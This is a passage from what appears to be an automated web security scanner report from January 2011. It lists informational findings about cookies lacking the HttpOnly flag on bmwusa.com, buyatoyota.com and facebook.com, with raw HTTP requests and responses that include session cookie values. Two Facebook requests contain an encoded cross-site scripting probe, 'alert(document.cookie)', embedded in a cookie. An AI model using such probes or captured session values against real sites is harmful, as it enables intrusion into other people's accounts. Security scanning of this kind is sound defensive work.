The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/z4sdrive35i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:08:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:28:19 GMT;path=/
Content-Length: 213976


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.426. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/features_and_specs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/z4/z4sdrive35i/features_and_specs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/z4sdrive35i/features_and_specs.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Standard/Content/Vehicles/2011/Z4/Z4sDrive35i/features_and_specs/default.aspx?from=/standard/content/vehicles/2011/z4/z4sdrive35i/features_and_specs.aspx&return=/standard/content/vehicles/2011/z4/z4sdrive35i/features_and_specs.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 401
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 22:09:06 GMT
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:29:06 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fStandard%2fContent%2fVehicles%2f2011%2fZ4%2fZ4sDrive35i%2ffeatures_and_specs%2fdefault.aspx%3ffrom%3d%2fstandard%2
...[SNIP]...

10.427. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/z4/z4sdrive35i/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/z4sdrive35i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:08:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:28:54 GMT;path=/
Content-Length: 215086


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.428. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/z4seriesroadstermediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/z4/z4sdrive35i/z4seriesroadstermediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/z4/z4sdrive35i/z4seriesroadstermediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:08:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:28:55 GMT;path=/
Content-Length: 202217


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.429. https://www.bmwusa.com/ScriptResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /ScriptResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ScriptResource.axd?d=xsYbuK7UM5sZi4sgTCQGLxdtzGqRs1PKkQMgf2iUU6r30EQJogswAvyo68dvUJYTVgi5uVrBob_AaI2WwdpOUs8_OfdMRKIRvOzu3nlcdOKo4McHeCE-VXEOoDvGmIjUxMiOI8-p6cynHt62iKqWq_-WJ1JLRo_Mnr4cF1MdnWuuCYkNo73irNzDSQk-1A5oR5uIyg2&t=6eeae64a HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; NSC_CNX_21529_64.29.204.16=4f52b42b3661; mbox=PC#1295637745501-300919.17#1296864682|check#true#1295655142|session#1295655081531-668160#1295656942

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:10:45 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:45 GMT;path=/
Content-Length: 28550

...Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.BoxSide = function() {
}
AjaxControlToolkit.BoxSide.prototype = {
Top : 0,
Right : 1,
Bottom : 2,
Left : 3
}
AjaxControlToolk
...[SNIP]...

10.430. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/Content/Forms/Login.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Secured/Content/Forms/Login.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Pragma: no-cache
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:51:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Fri, 21-Jan-11 20:11:48 GMT;path=/
Content-Length: 212811


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.431. https://www.bmwusa.com/Secured/FrameCheck.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/FrameCheck.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43 HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRkCmPwLZUcLGZgDQHB8EPuhdoa0MPkaYA89q2t3SYnOPa5KKaEJetjbTyfZfMtY2xdvcsAnZc8dTtALIF8A6taA21A83dHV0yvREQ9ZYi5DIqu7lJZdzAn3pLdhHpLkWqw==
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; NSC_CNX_21529_64.29.204.16=4f52b42b3661

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:10:38 GMT
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; path=/; HttpOnly
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:38 GMT;path=/
Content-Length: 738


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title><
...[SNIP]...

10.432. https://www.bmwusa.com/Secured/NaN

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/NaN

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Secured/NaN HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRkCmPwLZUcLGZgDQHB8EPuhdoa0MPkaYA89q2t3SYnOPa5KKaEJetjbTyfZfMtY2xdvcsAnZc8dTtALIF8A6taA21A83dHV0yvREQ9ZYi5DIqu7lJZdzAn3pLdhHpLkWqw==
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349; NSC_CNX_21529_64.29.204.16=4f52b42b3661

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 232
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:10:38 GMT
Connection: keep-alive
Set-Cookie: WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; path=/
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:38 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43">
...[SNIP]...

10.433. https://www.bmwusa.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd?d=ZCit8Gm9Dm66VElz-Dlx7uNapXPkA4epDI8AMwu3sVIkDC0fSDwQQvsa6O8fmHTyDoiwD63Zl_78HL2Qp1KFWorQ7nM1&t=634222732007903694 HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; NSC_CNX_21529_64.29.204.16=4f52b42b3661; mbox=PC#1295637745501-300919.17#1296864682|check#true#1295655142|session#1295655081531-668160#1295656942

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 20794
Content-Type: application/x-javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 22 Jan 2011 00:10:47 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:46 GMT;path=/

function WebForm_PostBackOptions(eventTarget, eventArgument, validation, validationGroup, actionUrl, trackFocus, clientSubmit) {
this.eventTarget = eventTarget;
this.eventArgument = eventArg
...[SNIP]...

10.434. https://www.bmwusa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; mbox=PC#1295637745501-300919.17#1296864682|check#true#1295655142|session#1295655081531-668160#1295656942; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; NSC_CNX_21529_64.29.204.16=4f52b42b3661

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.bmwusa.com/favicon.ico
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:11:09 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:31:09 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.bmwusa.com/favicon.ico">here</a>.</h2>
</body></html>

10.435. https://www.bmwusa.com/jsenvconst.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /jsenvconst.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsenvconst.ashx HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; NSC_CNX_21529_64.29.204.16=4f52b42b3661

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:10:43 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:43 GMT;path=/
Content-Length: 637

var WEBSITE_URL = "www.bmwusa.com";
var WEB_SERVICES_URL = "ws.bmwusa.com";
var WCF_SERVICES_URL = "ws.bmwusa.com";
var RESOURCE_SERVER_URL = "cache.bmwusa.com";
var MOBILE_URL = "m.bmwusa.com";

...[SNIP]...

10.436. http://www.buyatoyota.com/NationalLanding.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buyatoyota.com
Path:   /NationalLanding.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NationalLanding.aspx HTTP/1.1
Host: www.buyatoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Jan 2011 22:09:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: bgImage=Toyotathon_Flash_Piece; domain=.buyatoyota.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><!-- Page served fr
...[SNIP]...

10.437. http://www.facebook.com/BMWUSA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /BMWUSA

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BMWUSA HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=85x21; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=EvrQb; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 19:51:54 GMT
Content-Length: 37193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.438. http://www.facebook.com/EmploymentXing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /EmploymentXing

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EmploymentXing HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=Z_NLA; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FEmploymentXing; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FEmploymentXing; path=/; domain=.facebook.com
